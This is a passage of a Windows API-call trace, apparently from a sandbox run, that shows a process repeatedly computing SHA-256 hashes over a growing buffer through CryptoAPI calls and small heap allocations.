	[0187.500] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.500] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.500] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0xc00, dwFlags=0x0) returned 1
	[0187.500] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.500] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x262f10
	[0187.500] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x262f10, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x262f10, pdwDataLen=0x128aac) returned 1
	[0187.500] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.500] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.500] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.501] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.501] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0xc20, dwFlags=0x0) returned 1
	[0187.501] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.501] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x262f38
	[0187.501] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x262f38, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x262f38, pdwDataLen=0x128aac) returned 1
	[0187.501] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.501] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.501] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.501] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.501] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0xc40, dwFlags=0x0) returned 1
	[0187.502] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.502] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x262f60
	[0187.502] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x262f60, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x262f60, pdwDataLen=0x128aac) returned 1
	[0187.502] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.502] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.502] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.502] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.502] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0xc60, dwFlags=0x0) returned 1
	[0187.502] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.502] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x262f88
	[0187.502] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x262f88, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x262f88, pdwDataLen=0x128aac) returned 1
	[0187.502] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.502] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.502] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.503] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.503] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0xc80, dwFlags=0x0) returned 1
	[0187.503] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.503] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x262fb0
	[0187.503] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x262fb0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x262fb0, pdwDataLen=0x128aac) returned 1
	[0187.503] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.503] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.503] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.503] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.503] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0xca0, dwFlags=0x0) returned 1
	[0187.503] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.503] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x262fd8
	[0187.503] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x262fd8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x262fd8, pdwDataLen=0x128aac) returned 1
	[0187.503] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.503] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.503] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.504] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.504] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0xcc0, dwFlags=0x0) returned 1
	[0187.504] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.504] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263000
	[0187.504] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x263000, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x263000, pdwDataLen=0x128aac) returned 1
	[0187.504] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.504] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.504] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.504] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.504] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0xce0, dwFlags=0x0) returned 1
	[0187.504] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.504] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263028
	[0187.504] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x263028, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x263028, pdwDataLen=0x128aac) returned 1
	[0187.504] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.504] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.504] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.505] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.505] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0xd00, dwFlags=0x0) returned 1
	[0187.505] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.505] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263050
	[0187.505] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x263050, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x263050, pdwDataLen=0x128aac) returned 1
	[0187.505] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.505] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.505] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.505] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.505] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0xd20, dwFlags=0x0) returned 1
	[0187.505] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.505] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263078
	[0187.505] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x263078, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x263078, pdwDataLen=0x128aac) returned 1
	[0187.505] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.505] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.505] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.506] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.506] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0xd40, dwFlags=0x0) returned 1
	[0187.506] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.506] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2630a0
	[0187.506] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2630a0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2630a0, pdwDataLen=0x128aac) returned 1
	[0187.506] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.506] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.506] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.506] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.506] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0xd60, dwFlags=0x0) returned 1
	[0187.506] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.506] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2630c8
	[0187.506] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2630c8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2630c8, pdwDataLen=0x128aac) returned 1
	[0187.506] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.507] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.507] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.507] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.507] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0xd80, dwFlags=0x0) returned 1
	[0187.507] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.507] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2630f0
	[0187.507] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2630f0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2630f0, pdwDataLen=0x128aac) returned 1
	[0187.507] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.507] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.507] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.507] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.507] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0xda0, dwFlags=0x0) returned 1
	[0187.507] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.508] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263118
	[0187.508] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x263118, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x263118, pdwDataLen=0x128aac) returned 1
	[0187.508] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.508] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.508] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.508] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.508] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0xdc0, dwFlags=0x0) returned 1
	[0187.508] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.508] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263140
	[0187.508] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x263140, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x263140, pdwDataLen=0x128aac) returned 1
	[0187.508] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.508] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.508] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.509] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.509] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0xde0, dwFlags=0x0) returned 1
	[0187.509] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.509] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263168
	[0187.509] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x263168, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x263168, pdwDataLen=0x128aac) returned 1
	[0187.509] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.509] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.509] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.509] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.509] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0xe00, dwFlags=0x0) returned 1
	[0187.509] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.509] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263190
	[0187.509] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x263190, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x263190, pdwDataLen=0x128aac) returned 1
	[0187.509] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.509] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.509] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.510] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.510] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0xe20, dwFlags=0x0) returned 1
	[0187.510] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.510] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2631b8
	[0187.510] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2631b8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2631b8, pdwDataLen=0x128aac) returned 1
	[0187.510] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.510] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.510] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.510] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.510] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0xe40, dwFlags=0x0) returned 1
	[0187.510] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.510] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2631e0
	[0187.510] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2631e0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2631e0, pdwDataLen=0x128aac) returned 1
	[0187.510] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.510] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.510] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.511] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.511] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0xe60, dwFlags=0x0) returned 1
	[0187.511] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.511] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263208
	[0187.511] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x263208, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x263208, pdwDataLen=0x128aac) returned 1
	[0187.511] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.511] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.511] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.511] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.511] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0xe80, dwFlags=0x0) returned 1
	[0187.511] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.511] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263230
	[0187.511] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x263230, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x263230, pdwDataLen=0x128aac) returned 1
	[0187.511] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.511] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.511] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.512] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.512] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0xea0, dwFlags=0x0) returned 1
	[0187.512] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.512] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263258
	[0187.512] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x263258, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x263258, pdwDataLen=0x128aac) returned 1
	[0187.512] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.512] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.512] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.512] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.512] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0xec0, dwFlags=0x0) returned 1
	[0187.512] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.513] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263280
	[0187.513] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x263280, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x263280, pdwDataLen=0x128aac) returned 1
	[0187.513] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.513] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.513] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.513] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.513] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0xee0, dwFlags=0x0) returned 1
	[0187.513] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.513] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2632a8
	[0187.513] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2632a8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2632a8, pdwDataLen=0x128aac) returned 1
	[0187.513] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.513] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.513] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.514] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.514] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0xf00, dwFlags=0x0) returned 1
	[0187.514] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.514] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2632d0
	[0187.514] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2632d0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2632d0, pdwDataLen=0x128aac) returned 1
	[0187.514] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.514] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.514] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
